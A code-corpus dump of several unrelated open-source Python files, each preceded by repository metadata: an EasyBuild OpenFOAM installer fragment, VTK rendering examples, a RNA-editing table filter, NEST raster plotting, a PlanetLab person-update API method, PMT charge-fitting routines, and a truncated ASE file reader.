stat.S_IXOTH, add=True, recursive=True, onlydirs=True, ignore_errors=True) def sanity_check_step(self): """Custom sanity check for OpenFOAM""" psubdir = "linux64%sDPOpt" % self.wm_compiler openfoam_extend_v3 = 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion('3.0') if openfoam_extend_v3 or LooseVersion(self.version) < LooseVersion("2"): toolsdir = os.path.join(self.openfoamdir, "applications", "bin", psubdir) libsdir = os.path.join(self.openfoamdir, "lib", psubdir) dirs = [toolsdir, libsdir] else: toolsdir = os.path.join(self.openfoamdir, "platforms", psubdir, "bin") libsdir = os.path.join(self.openfoamdir, "platforms", psubdir, "lib") dirs = [toolsdir, libsdir] # some randomly selected binaries # if one of these is missing, it's very likely something went wrong bins = [os.path.join(self.openfoamdir, "bin", x) for x in ["foamExec", "paraFoam"]] + \ [os.path.join(toolsdir, "buoyant%sSimpleFoam" % x) for x in ["", "Boussinesq"]] + \ [os.path.join(toolsdir, "%sFoam" % x) for x in ["boundary", "engine", "sonic"]] + \ [os.path.join(toolsdir, "surface%s" % x) for x in ["Add", "Find", "Smooth"]] + \ [os.path.join(toolsdir, x) for x in ["deformedGeom", "engineSwirl", "modifyMesh", "refineMesh", "vorticity"]] # check for the Pstream and scotchDecomp libraries, there must be a dummy one and an mpi one if 'extend' in self.name.lower(): libs = [os.path.join(libsdir, x, "libPstream.so") for x in ["dummy", "mpi"]] + \ [os.path.join(libsdir, "libscotchDecomp.so")] else: libs = [os.path.join(libsdir, x, "libPstream.so") for x in ["dummy", "mpi"]] + \ [os.path.join(libsdir, x, "libptscotchDecomp.so") for x in ["dummy", "mpi"]] +\ [os.path.join(libsdir, "libscotchDecomp.so")] + \ [os.path.join(libsdir, "dummy", "libscotchDecomp.so")] if not 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion("2.3.0"): # surfaceSmooth is replaced by surfaceLambdaMuSmooth is OpenFOAM v2.3.0 bins.remove(os.path.join(toolsdir, "surfaceSmooth")) bins.append(os.path.join(toolsdir, "surfaceLambdaMuSmooth")) custom_paths = { 'files': [os.path.join(self.openfoamdir, 'etc', x) for x in ["bashrc", "cshrc"]] + bins + libs, 'dirs': dirs, } super(EB_OpenFOAM, self).sanity_check_step(custom_paths=custom_paths) def make_module_extra(self): """Define extra environment variables required by OpenFOAM""" txt = super(EB_OpenFOAM, self).make_module_extra() env_vars = [ ("WM_PROJECT_VERSION", self.version), ("FOAM_INST_DIR", self.installdir), ("WM_COMPILER", self.wm_compiler), ("WM_MPLIB", self.wm_mplib), ("FOAM_BASH", os.path.join(self.installdir, self.openfoamdir, "etc", "bashrc")), ("FOAM_CSH", os.path.join(self.installdir, self.openfoamdir, "etc", "cshrc")), ] for (env_var, val) in env_vars: txt += self.module_generator.set_environment(env_var, val) return txt
ULHPC/modules
easybuild/easybuild-easyblocks/easybuild/easyblocks/o/openfoam.py
Python
mit
12,010
[ "ParaView" ]
194c9774bc16e9211bf35a6857b74320dc5133a0879031462a46dbf5fc927d4d
#!/usr/bin/env python # This example shows how to apply an vtkImageData texture to an plane # vtkPolyData object. # Note: Input jpg file can be located in the VTKData repository. # # @author JBallesteros ## import vtk jpegfile = "earth_display.jpg" # Create a render window ren = vtk.vtkRenderer() renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren) renWin.SetSize(480,480) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) # Generate plane polydata plane = vtk.vtkPlaneSource() # Read the image data from a file reader = vtk.vtkJPEGReader() reader.SetFileName(jpegfile) # Create texture object texture = vtk.vtkTexture() texture.SetInput(reader.GetOutput()) # Map texture coordinates map_to_plane = vtk.vtkTextureMapToPlane() map_to_plane.SetInput(plane.GetOutput()) # Create mapper and set the mapped texture as input mapper = vtk.vtkPolyDataMapper() if vtk.VTK_MAJOR_VERSION <= 5: mapper.SetInput(map_to_plane.GetOutput()) else: mapper.SetInputConnection(map_to_plane.GetOutputPort()) # Create actor and set the mapper and the texture actor = vtk.vtkActor() actor.SetMapper(mapper) actor.SetTexture(texture) ren.AddActor(actor) iren.Initialize() renWin.Render() iren.Start()
nicjhan/mom-particles
vtk/plane.py
Python
gpl-2.0
1,219
[ "VTK" ]
d766e8d7c7c0dca5bbe6e53d9125661e30dc6188c35613ac5348ac6f0c2935fa
#!/home/epicardi/bin/python27/bin/python # Copyright (c) 2013-2014 Ernesto Picardi <ernesto.picardi@uniba.it> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """ To do: filtering according to strand of positions in table file """ import sys, time, getopt, string, os, random try: import pysam except: sys.exit('Pysam module not found.') pid=str(os.getpid()+random.randint(0,999999999)) def usage(): print """ USAGE: python FilterTable.py [options] Options: -i Table file -f Sorted file with positions to filter in -s Sorted file with positions to filter out -F Features to filter in (separated by comma) -S Features to filter out (separated by comma) -E Exclude positions filtered out -o Save filtered lines to a file [stdout] -p Print simple statistics -h Print this help """ try: opts, args = getopt.getopt(sys.argv[1:], 'i:o:f:hs:F:S:Ep',["help"]) except getopt.GetoptError, err: print str(err) usage() sys.exit() if len(opts)==0: usage() sys.exit() tablefile,outfile='','' ffile,ofile='','' save,ff,fo,exp,ps=0,0,0,0,0 infeat,outfeat=[],[] for o,a in opts: if o in ("-h","--help"): usage() sys.exit() elif o == "-i": tablefile = a if not os.path.exists(tablefile): usage() sys.exit('Table file not found') elif o == "-o": outfile = a save=1 elif o == "-s": ofile = a fo=1 if ofile=='': usage() sys.exit('Sorted file with positions to filter out not found.') elif o == "-f": ffile = a ff=1 if ffile=='': usage() sys.exit('Sorted file with positions to filter in not found.') elif o == "-F": infeat=[x.lower() for x in a.split(',')] elif o == "-S": outfeat=[x.lower() for x in a.split(',')] elif o == "-E": exp=1 elif o == "-p": ps=1 else: assert False, "unhandled option" # Funzioni def filterIn(chr,exfeat,pos): if len(exfeat)==0: return 1 if ff and not chr in contigf: return 0 elif not ff: return 1 res=[(kk.feature).lower() for kk in tabixf.fetch(reference=chr,start=pos,end=pos+1,parser=pysam.asGTF())] for i in exfeat: if i in res: return 1 return 0 def filterOut(chr,exfeat,pos): if len(exfeat)==0: return 0 if fo and not chr in contigo: return 0 elif not fo: return 0 res=[(kk.feature).lower() for kk in tabixo.fetch(reference=chr,start=pos,end=pos+1,parser=pysam.asGTF())] for i in exfeat: if i in res: return 1 return 0 script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time())) sys.stderr.write("Script time --> START: %s\n" %(script_time)) if fo: if not os.path.exists(ofile+'.tbi'): sys.stderr.write('Indexing %s file.\n' %(ofile)) ofile=pysam.tabix_index(ofile, preset='gff') if ff: if not os.path.exists(ffile+'.tbi'): sys.stderr.write('Indexing %s file.\n' %(ffile)) ffile=pysam.tabix_index(ffile, preset='gff') if fo: tabixo=pysam.Tabixfile(ofile) contigo=tabixo.contigs if ff: tabixf=pysam.Tabixfile(ffile) contigf=tabixf.contigs sys.stderr.write('Reading Table file...\n') if save: o=open(outfile,'w') f=open(tablefile) y,x,xx=0,0,0 for i in f: if i.strip()=='': continue if i.startswith('#'): continue if i.startswith('Region'): if save: o.write(i.strip()+'\n') else: sys.stdout.write(i) continue l=(i.strip('\n')).split('\t') xx+=1 reg,pos = l[0],int(l[1]) # sottrarre -1 per la ricerca nella tabella fin=filterIn(reg,infeat,pos-1) fout=filterOut(reg,outfeat,pos-1) if fin: if fout: x+=1 if exp: continue if save: o.write('#'+i) else: sys.stdout.write('#'+i) else: y+=1 if save: o.write(i) else: sys.stdout.write(i) else: x+=1 if exp: continue if save: o.write('#'+i) else: sys.stdout.write('#'+i) f.close() if save: o.close() if ff: tabixf.close() if fo: tabixo.close() if ps: sys.stdout.write("All positions: %i\n" %(xx)) sys.stdout.write("Positions filtered in: %i\n" %(y)) sys.stdout.write("Positions filtered out: %i\n" %(x)) script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time())) sys.stderr.write("Script time --> END: %s\n" %(script_time))
RNAEDITINGPLUS/main
node/reditools-1.0.4/reditools/FilterTable.py
Python
apache-2.0
5,006
[ "pysam" ]
0444e190b0137f9ad8aa2763ddc5f6c5673ff482cb9a2fa8f73e7d4eb80fd6a8
#! /usr/bin/env python # # raster_plot.py # # This file is part of NEST. # # Copyright (C) 2004 The NEST Initiative # # NEST is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # NEST is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with NEST. If not, see <http://www.gnu.org/licenses/>. import nest import numpy import pylab def extract_events(data, time=None, sel=None): """ Extracts all events within a given time interval or are from a given set of neurons. - data is a matrix such that data[:,0] is a vector of all gids and data[:,1] a vector with the corresponding time stamps. - time is a list with at most two entries such that time=[t_max] extracts all events with t< t_max time=[t_min, t_max] extracts all events with t_min <= t < t_max - sel is a list of gids such that sel=[gid1, ... , gidn] extracts all events from these gids. All others are discarded. Both time and sel may be used at the same time such that all events are extracted for which both conditions are true. """ val = [] if time: t_max = time[-1] if len(time) > 1: t_min = time[0] else: t_min = 0 for v in data: t = v[1] gid = v[0] if time and (t < t_min or t >= t_max): continue if not sel or gid in sel: val.append(v) return numpy.array(val) def from_data(data, title=None, hist=False, hist_binwidth=5.0, grayscale=False, sel=None): """ Plot raster from data array """ ts = data[:, 1] d = extract_events(data, sel=sel) ts1 = d[:, 1] gids = d[:, 0] return _make_plot(ts, ts1, gids, data[:, 0], hist, hist_binwidth, grayscale, title) def from_file(fname, title=None, hist=False, hist_binwidth=5.0, grayscale=False): """ Plot raster from file """ if nest.is_sequencetype(fname): data = None for f in fname: if data is None: data = numpy.loadtxt(f) else: data = numpy.concatenate((data, numpy.loadtxt(f))) else: data = numpy.loadtxt(fname) return from_data(data, title, hist, hist_binwidth, grayscale) def from_device(detec, title=None, hist=False, hist_binwidth=5.0, grayscale=False, plot_lid=False): """ Plot raster from spike detector """ if not nest.GetStatus(detec)[0]["model"] == "spike_detector": raise nest.NESTError("Please provide a spike_detector.") if nest.GetStatus(detec, "to_memory")[0]: ts, gids = _from_memory(detec) if not len(ts): raise nest.NESTError("No events recorded!") if plot_lid: gids = [nest.GetLID([x]) for x in gids] if title is None: title = "Raster plot from device '%i'" % detec[0] if nest.GetStatus(detec)[0]["time_in_steps"]: xlabel = "Steps" else: xlabel = "Time (ms)" return _make_plot(ts, ts, gids, gids, hist, hist_binwidth, grayscale, title, xlabel) elif nest.GetStatus(detec, "to_file")[0]: fname = nest.GetStatus(detec, "filenames")[0] return from_file(fname, title, hist, hist_binwidth, grayscale) else: raise nest.NESTError("No data to plot. Make sure that either to_memory or to_file are set.") def _from_memory(detec): ev = nest.GetStatus(detec, "events")[0] return ev["times"], ev["senders"] def _make_plot(ts, ts1, gids, neurons, hist, hist_binwidth, grayscale, title, xlabel=None): """ Generic plotting routine that constructs a raster plot along with an optional histogram (common part in all routines above) """ pylab.figure() if grayscale: color_marker = ".k" color_bar = "gray" else: color_marker = "." color_bar = "blue" color_edge = "black" if xlabel is None: xlabel = "Time (ms)" ylabel = "Neuron ID" if hist: ax1 = pylab.axes([0.1, 0.3, 0.85, 0.6]) plotid = pylab.plot(ts1, gids, color_marker) pylab.ylabel(ylabel) pylab.xticks([]) xlim = pylab.xlim() pylab.axes([0.1, 0.1, 0.85, 0.17]) t_bins = numpy.arange(numpy.amin(ts), numpy.amax(ts), float(hist_binwidth)) n, bins = _histogram(ts, bins=t_bins) num_neurons = len(numpy.unique(neurons)) heights = 1000 * n / (hist_binwidth * num_neurons) pylab.bar(t_bins, heights, width=hist_binwidth, color=color_bar, edgecolor=color_edge) pylab.yticks(map(lambda x: int(x), numpy.linspace(0.0, int(max(heights) * 1.1) + 5, 4))) pylab.ylabel("Rate (Hz)") pylab.xlabel(xlabel) pylab.xlim(xlim) pylab.axes(ax1) else: plotid = pylab.plot(ts1, gids, color_marker) pylab.xlabel(xlabel) pylab.ylabel(ylabel) if title is None: pylab.title("Raster plot") else: pylab.title(title) pylab.draw() return plotid def _histogram(a, bins=10, range=None, normed=False): from numpy import asarray, iterable, linspace, sort, concatenate a = asarray(a).ravel() if range is not None: mn, mx = range if mn > mx: raise AttributeError, "max must be larger than min in range parameter." if not iterable(bins): if range is None: range = (a.min(), a.max()) mn, mx = [mi + 0.0 for mi in range] if mn == mx: mn -= 0.5 mx += 0.5 bins = linspace(mn, mx, bins, endpoint=False) else: if(bins[1:] - bins[:-1] < 0).any(): raise AttributeError, "bins must increase monotonically." # best block size probably depends on processor cache size block = 65536 n = sort(a[:block]).searchsorted(bins) for i in xrange(block, a.size, block): n += sort(a[i:i + block]).searchsorted(bins) n = concatenate([n, [len(a)]]) n = n[1:] - n[:-1] if normed: db = bins[1] - bins[0] return 1.0 / (a.size * db) * n, bins else: return n, bins def show(): """ Call pylab.show() to show all figures and enter the GUI main loop. Python will block until all figure windows are closed again. You should call this function only once at the end of a script. See also: http://matplotlib.sourceforge.net/faq/howto_faq.html#use-show """ pylab.show()
gewaltig/cython-neuron
pynest/nest/raster_plot.py
Python
gpl-2.0
6,848
[ "NEURON" ]
4db8c520071fbf036d9b24a73b76aa934c77887c0b14c7b16fe91e05c7e3dc95
from PLC.Faults import * from PLC.Method import Method from PLC.Parameter import Parameter, Mixed from PLC.Auth import Auth from PLC.Table import Row from PLC.Persons import Person, Persons from PLC.sendmail import sendmail from PLC.TagTypes import TagTypes from PLC.PersonTags import PersonTags, PersonTag from PLC.Namespace import email_to_hrn related_fields = list(Person.related_fields.keys()) can_update = ['first_name', 'last_name', 'title', 'email', 'password', 'phone', 'url', 'bio', 'accepted_aup', 'enabled'] + related_fields class UpdatePerson(Method): """ Updates a person. Only the fields specified in person_fields are updated, all other fields are left untouched. Users and techs can only update themselves. PIs can only update themselves and other non-PIs at their sites. Returns 1 if successful, faults otherwise. """ roles = ['admin', 'pi', 'user', 'tech'] accepted_fields = Row.accepted_fields(can_update,Person.fields) # xxx check the related_fields feature accepted_fields.update(Person.related_fields) accepted_fields.update(Person.tags) accepts = [ Auth(), Mixed(Person.fields['person_id'], Person.fields['email']), accepted_fields ] returns = Parameter(int, '1 if successful') def call(self, auth, person_id_or_email, person_fields): # split provided fields [native,related,tags,rejected] = Row.split_fields(person_fields,[Person.fields,Person.related_fields,Person.tags]) # type checking native = Row.check_fields (native, self.accepted_fields) if rejected: raise PLCInvalidArgument("Cannot update Person column(s) %r"%rejected) # Authenticated function assert self.caller is not None # Get account information persons = Persons(self.api, [person_id_or_email]) if not persons: raise PLCInvalidArgument("No such account %s"%person_id_or_email) person = persons[0] if person['peer_id'] is not None: raise PLCInvalidArgument("Not a local account %s"%person_id_or_email) # Check if we can update this account if not self.caller.can_update(person): raise PLCPermissionDenied("Not allowed to update specified account") # Make requested associations for k,v in related.items(): person.associate (auth, k, v) person.update(native) person.update_last_updated(False) person.sync(commit=True) # send a mail if 'enabled' in person_fields: To = [("%s %s" % (person['first_name'], person['last_name']), person['email'])] Cc = [] if person['enabled']: Subject = "%s account enabled" % (self.api.config.PLC_NAME) Body = "Your %s account has been enabled. Please visit %s to access your account." % (self.api.config.PLC_NAME, self.api.config.PLC_WWW_HOST) else: Subject = "%s account disabled" % (self.api.config.PLC_NAME) Body = "Your %s account has been disabled. Please contact your PI or PlanetLab support for more information" % (self.api.config.PLC_NAME) sendmail(self.api, To = To, Cc = Cc, Subject = Subject, Body = Body) # if email was modifed make sure to update the hrn tag if 'email' in native: hrn_tag=PersonTags(self.api,{'tagname':'hrn','person_id':person['person_id']}) if hrn_tag: old_hrn = hrn_tag[0]['value'] root_auth = self.api.config.PLC_HRN_ROOT login_base = old_hrn.split('.')[-2] hrn=email_to_hrn("%s.%s"%(root_auth,login_base),person['email']) tags['hrn'] = hrn for (tagname,value) in tags.items(): # the tagtype instance is assumed to exist, just check that tag_types = TagTypes(self.api,{'tagname':tagname}) if not tag_types: raise PLCInvalidArgument("No such TagType %s"%tagname) tag_type = tag_types[0] person_tags=PersonTags(self.api,{'tagname':tagname,'person_id':person['person_id']}) if not person_tags: person_tag = PersonTag(self.api) person_tag['person_id'] = person['person_id'] person_tag['tag_type_id'] = tag_type['tag_type_id'] person_tag['tagname'] = tagname person_tag['value'] = value person_tag.sync() else: person_tag = person_tags[0] person_tag['value'] = value person_tag.sync() # Logging variables self.event_objects = {'Person': [person['person_id']]} # Redact password if 'password' in person_fields: person_fields['password'] = "Removed by API" self.message = 'Person %d updated: %s.' % \ (person['person_id'], list(person_fields.keys())) if 'enabled' in person_fields: self.message += ' Person enabled' return 1
dreibh/planetlab-lxc-plcapi
PLC/Methods/UpdatePerson.py
Python
bsd-3-clause
5,165
[ "VisIt" ]
01c146db508ac8857d8dc563dcd023932c3e47a827bb061574735aa9d3d5424b
#!/usr/bin/env python # -*- coding: utf-8 -*- import vtk def main(): # Create five points. origin = [0.0, 0.0, 0.0] p0 = [1.0, 0.0, 0.0] p1 = [0.0, 1.0, 0.0] p2 = [0.0, 1.0, 2.0] p3 = [1.0, 2.0, 3.0] # Create a vtkPoints object and store the points in it points = vtk.vtkPoints() points.InsertNextPoint(origin) points.InsertNextPoint(p0) points.InsertNextPoint(p1) points.InsertNextPoint(p2) points.InsertNextPoint(p3) # Create a cell array to store the lines in and add the lines to it lines = vtk.vtkCellArray() for i in range(0, 3): line = vtk.vtkLine() line.GetPointIds().SetId(0, i) line.GetPointIds().SetId(1, i + 1) lines.InsertNextCell(line) # Create a polydata to store everything in linesPolyData = vtk.vtkPolyData() # Add the points to the dataset linesPolyData.SetPoints(points) # Add the lines to the dataset linesPolyData.SetLines(lines) # Setup actor and mapper colors = vtk.vtkNamedColors() mapper = vtk.vtkPolyDataMapper() mapper.SetInputData(linesPolyData) actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().SetLineWidth(4) actor.GetProperty().SetColor(colors.GetColor3d("Peacock")) # Setup render window, renderer, and interactor renderer = vtk.vtkRenderer() renderWindow = vtk.vtkRenderWindow() renderWindow.SetWindowName("Long Line") renderWindow.AddRenderer(renderer) renderWindowInteractor = vtk.vtkRenderWindowInteractor() renderWindowInteractor.SetRenderWindow(renderWindow) renderer.AddActor(actor) renderer.ResetCamera() renderer.GetActiveCamera().Azimuth(30) renderer.GetActiveCamera().Elevation(30) renderer.ResetCameraClippingRange() renderer.SetBackground(colors.GetColor3d("Silver")) renderWindow.Render() renderWindowInteractor.Start() if __name__ == '__main__': main()
lorensen/VTKExamples
src/Python/GeometricObjects/LongLine.py
Python
apache-2.0
1,952
[ "VTK" ]
77f23998ca10788900172e9e3c4e1d1a6044058293a875a5d89324d8b8b69d78
""" Some basic routines to fit models """ from pyosci import tools from pyosci import plotting as plt from pyevsel.fitting import gauss, Model from functools import reduce import pylab as p import numpy as np import dashi as d import seaborn.apionly as sb d.visual() from collections import namedtuple from . import characteristics as c from . import charge_response_model as crm PALETTE = sb.color_palette() def pedestal_fit(filename, nbins, fig=None): """ Fit a pedestal to measured waveform data One shot function for * integrating the charges * making a histogram * fitting a simple gaussian to the pedestal * calculating mu P(hit) = (N_hit/N_all) = exp(QExCExLY) where P is the probability for a hit, QE is quantum efficiency, CE is the collection efficiency and LY the (unknown) light yield Args: filename (str): Name of the file with waveform data nbins (int): number of bins for the underlaying charge histogram """ head, wf = tools.load_waveform(filename) charges = -1e12 * tools.integrate_wf(head, wf) plt.plot_waveform(head, tools.average_wf(wf)) p.savefig(filename.replace(".npy", ".wf.pdf")) one_gauss = lambda x, n, y, z: n * gauss(x, y, z, 1) ped_mod = Model(one_gauss, (1000, -.1, 1)) ped_mod.add_data(charges, nbins, create_distribution=True, normalize=False) ped_mod.fit_to_data(silent=True) fig = ped_mod.plot_result(add_parameter_text=((r"$\mu_{{ped}}$& {:4.2e}\\", 1), \ (r"$\sigma_{{ped}}$& {:4.2e}\\", 2)), \ xlabel=r"$Q$ [pC]", ymin=1, xmax=8, model_alpha=.2, fig=fig, ylabel="events") ax = fig.gca() n_hit = abs(ped_mod._distribution.bincontent - ped_mod.prediction(ped_mod.xs)).sum() ax.grid(1) bins = np.linspace(min(charges), max(charges), nbins) data = d.factory.hist1d(charges, bins) n_pedestal = ped_mod._distribution.stats.nentries - n_hit mu = -1 * np.log(n_pedestal / ped_mod._distribution.stats.nentries) print("==============") print("All waveforms: {:4.2f}".format(ped_mod._distribution.stats.nentries)) print("HIt waveforms: {:4.2f}".format(n_hit)) print("NoHit waveforms: {:4.2f}".format(n_pedestal)) print("mu = -ln(N_PED/N_TRIG) = {:4.2e}".format(mu)) ax.fill_between(ped_mod.xs, 1e-4, ped_mod.prediction(ped_mod.xs),\ facecolor=PALETTE[2], alpha=.2) p.savefig(filename.replace(".npy", ".pdf")) return ped_mod def create_charge_response_from_file(name): """ One shot function to create a default charge spectrum from a file with waveform data Args: name (str): path to a file with numpy readable waveform data """ head, wf = tools.load_waveform(name) plt.plot_waveform(head, tools.average_wf(wf)) all_charges = 1e12 * np.array([-1 * tools.integrate_wf(head, w) for w in wf]) # all_charges = all_charges[all_charges > -0.53] mu = c.calculate_mu(all_charges, 200) nhit, nall = c.get_n_hit(all_charges, 200) charge_response_model = crm.construct_charge_response_model(all_charges,\ model_2PE_response=True,\ convolved_exponential=True,\ lowest_mpe_contrib=2) fitparams = namedtuple("fitparams", ["N_i", "mu_p", "sigma_p", "p", "A", "mu", "sigma"]) startparams = fitparams(1, -.2, .1, .8, .3, 3, .2) bounds = ((0, -3, 0, .0, 0, 0, .05), (1, 0, .5, 1, 100, 5, 5)) model = fit_model(all_charges, charge_response_model, startparams, rej_outliers=False,\ bounds=bounds) fig = model.plot_result(ymin=1e-4, xmax=5, xlabel=r"$Q$ [pC]",\ model_alpha=.8,\ add_parameter_text=((r"$\sigma_{{ped}}$& {:4.2e}\\", 2), (r"$\mu_{{SPE}}$& {:4.2e}\\", 5),\ (r"$\sigma_{{SPE}}$& {:4.2e}\\", 6),\ (r"$p_{{exp}}$& {:4.2e}\\", 3))) return model, fig ############################################################## def fit_model(charges, model, startparams=None, \ rej_outliers=False, nbins=200, \ silent=False,\ parameter_text=((r"$\mu_{{SPE}}$& {:4.2e}\\", 5),), use_minuit=False,\ normalize=True,\ **kwargs): """ Standardazied fitting routine Args: charges (np.ndarray): Charges obtained in a measurement (no histogram) model (pyevsel.fitting.Model): A model to fit to the data startparams (tuple): initial parameters to model, or None for first guess Keyword Args: rej_outliers (bool): Remove extreme outliers from data nbins (int): Number of bins parameter_text (tuple): will be passed to model.plot_result use_miniuit (bool): use minuit to minimize startparams for best chi2 normalize (bool): normalize data before fitting silent (bool): silence output Returns: tuple """ if rej_outliers: charges = reject_outliers(charges) if use_minuit: from iminuit import Minuit # FIXME!! This is too ugly. Minuit wants named parameters ... >.< assert len(startparams) < 10; "Currently more than 10 paramters are not supported for minuit fitting!" assert model.all_coupled, "Minuit fitting can only be done for models with all parmaters coupled!" names = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k"] funcstring = "def do_min(" for i,__ in enumerate(startparams): funcstring += names[i] + "," funcstring = funcstring[:-1] + "):\n" funcstring += "\tmodel.startparams = (" for i,__ in enumerate(startparams): funcstring += names[i] + "," funcstring = funcstring[:-1] + ")\n" funcstring += "\tmodel.fit_to_data(charges, nbins, silent=True, **kwargs)" funcstring += "\treturn model.chi2_ndf" #def do_min(a, b, c, d, e, f, g, h, i, j, k): #FIXME!!! # model.startparams = (a, b, c, d, e, f, g, h, i, j, k) # model.fit_to_data(charges, nbins, silent=True, **kwargs) # return model.chi2_ndf exec(funcstring) bnd = kwargs["bounds"] if "bounds" in kwargs: min_kwargs = dict() for i,__ in enumerate(startparams): min_kwargs["limit_" + names[i]] =(bnd[0][i],bnd[1][i]) m = Minuit(do_min, **min_kwargs) #m = Minuit(do_min, limit_a=(bnd[0][0],bnd[1][0]), # limit_b=(bnd[0][1],bnd[1][1]), # limit_c=(bnd[0][2],bnd[1][2]), # limit_d=(bnd[0][3],bnd[1][3]), # limit_e=(bnd[0][4],bnd[1][4]), # limit_f=(bnd[0][5],bnd[1][5]), # limit_g=(bnd[0][6],bnd[1][6]), # limit_h=(bnd[0][7],bnd[1][7]), # limit_i=(bnd[0][8],bnd[1][8]), # limit_j=(bnd[0][9],bnd[1][9]), # limit_k=(bnd[0][10],bnd[1][10])) else: m = Minuit(do_min) # hand over the startparams for key, value in zip(["a","b","c","d","e","f","g","h","i","j"], startparams): m.values[key] = value m.migrad() else: model.startparams = startparams model.fit_to_data(charges, nbins,normalize=normalize, silent=silent, **kwargs) # check for named tuple if hasattr(startparams, "_make"): # duck typing best_fit_params = startparams._make(model.best_fit_params) else: best_fit_params = model.best_fit_params print("Best fit parameters {}".format(best_fit_params)) return model
achim1/pmttools
pmttools/fit_routines.py
Python
gpl-3.0
8,148
[ "Gaussian" ]
b7e7d67ec2b7a4f7a7d9d990c9313a6aff4963904df82ca64a45fbce5d6d0d00
import os import sys from os.path import basename from tarfile import is_tarfile from zipfile import is_zipfile from ase.atoms import Atoms from ase.units import Bohr from ase.io.trajectory import PickleTrajectory from ase.io.bundletrajectory import BundleTrajectory __all__ = ['read', 'write', 'PickleTrajectory', 'BundleTrajectory'] def read(filename, index=-1, format=None): """Read Atoms object(s) from file. filename: str Name of the file to read from. index: int or slice If the file contains several configurations, the last configuration will be returned by default. Use index=n to get configuration number n (counting from zero). format: str Used to specify the file-format. If not given, the file-format will be guessed by the *filetype* function. Known formats: ========================= =========== format short name ========================= =========== GPAW restart-file gpw Dacapo netCDF output file dacapo Old ASE netCDF trajectory nc Virtual Nano Lab file vnl ASE pickle trajectory traj ASE bundle trajectory bundle GPAW text output gpaw-text CUBE file cube XCrySDen Structure File xsf Dacapo text output dacapo-text XYZ-file xyz VASP POSCAR/CONTCAR file vasp VASP OUTCAR file vasp_out Protein Data Bank pdb CIF-file cif FHI-aims geometry file aims FHI-aims output file aims_out VTK XML Image Data vti VTK XML Structured Grid vts VTK XML Unstructured Grid vtu TURBOMOLE coord file tmol exciting input exi AtomEye configuration cfg WIEN2k structure file struct DftbPlus input file dftb ETSF format etsf.nc ========================= =========== """ if isinstance(filename, str): p = filename.rfind('@') if p != -1: try: index = string2index(filename[p + 1:]) except ValueError: pass else: filename = filename[:p] if isinstance(index, str): index = string2index(index) if format is None: format = filetype(filename) if format.startswith('gpw'): import gpaw r = gpaw.io.open(filename, 'r') positions = r.get('CartesianPositions') * Bohr numbers = r.get('AtomicNumbers') cell = r.get('UnitCell') * Bohr pbc = r.get('BoundaryConditions') tags = r.get('Tags') magmoms = r.get('MagneticMoments') atoms = Atoms(positions=positions, numbers=numbers, cell=cell, pbc=pbc) if tags.any(): atoms.set_tags(tags) if magmoms.any(): atoms.set_initial_magnetic_moments(magmoms) return atoms if format == 'exi': from ase.io.exciting import read_exciting return read_exciting(filename, index) if format == 'xyz': from ase.io.xyz import read_xyz return read_xyz(filename, index) if format == 'traj': from ase.io.trajectory import read_trajectory return read_trajectory(filename, index) if format == 'bundle': from ase.io.bundletrajectory import read_bundletrajectory return read_bundletrajectory(filename, index) if format == 'cube': from ase.io.cube import read_cube return read_cube(filename, index) if format == 'nc': from ase.io.netcdf import read_netcdf return read_netcdf(filename, index) if format == 'gpaw-text': from ase.io.gpawtext import read_gpaw_text return read_gpaw_text(filename, index) if format == 'dacapo-text': from ase.io.dacapo import read_dacapo_text return read_dacapo_text(filename) if format == 'dacapo': from ase.io.dacapo import read_dacapo return read_dacapo(filename) if format == 'xsf': from ase.io.xsf import read_xsf return read_xsf(filename, index) if format == 'vasp': from ase.io.vasp import read_vasp return read_vasp(filename) if format == 'vasp_out': from ase.io.vasp import read_vasp_out return read_vasp_out(filename, index) if format == 'mol': from ase.io.mol import read_mol return read_mol(filename) if format == 'pdb': from ase.io.pdb import read_pdb return read_pdb(filename) if format == 'cif': from ase.io.cif import read_cif return read_cif(filename, index) if format == 'struct': from ase.io.wien2k import read_struct return read_struct(filename) if format == 'vti': from ase.io.vtkxml import read_vti return read_vti(filename) if format == 'vts': from ase.io.vtkxml import read_vts return read_vts(filename) if format == 'vtu': from ase.io.vtkxml import read_vtu return read_vtu(filename) if format == 'aims': from ase.io.aims import read_aims return read_aims(filename) if format == 'aims_out': from ase.io.aims import read_aims_output return read_aims_output(filename, index) if format == 'iwm': from ase.io.iwm import read_iwm return read_iwm(filename) if format == 'Cmdft': from ase.io.cmdft import read_I_info return read_I_info(filename) if format == 'tmol': from ase.io.turbomole import read_turbomole return read_turbomole(filename) if format == 'cfg': from ase.io.cfg import read_cfg return read_cfg(filename) if format == 'dftb': from ase.io.dftb import read_dftb return read_dftb(filename) if format == 'sdf': from ase.io.sdf import read_sdf return read_sdf(filename) if format == 'etsf': from 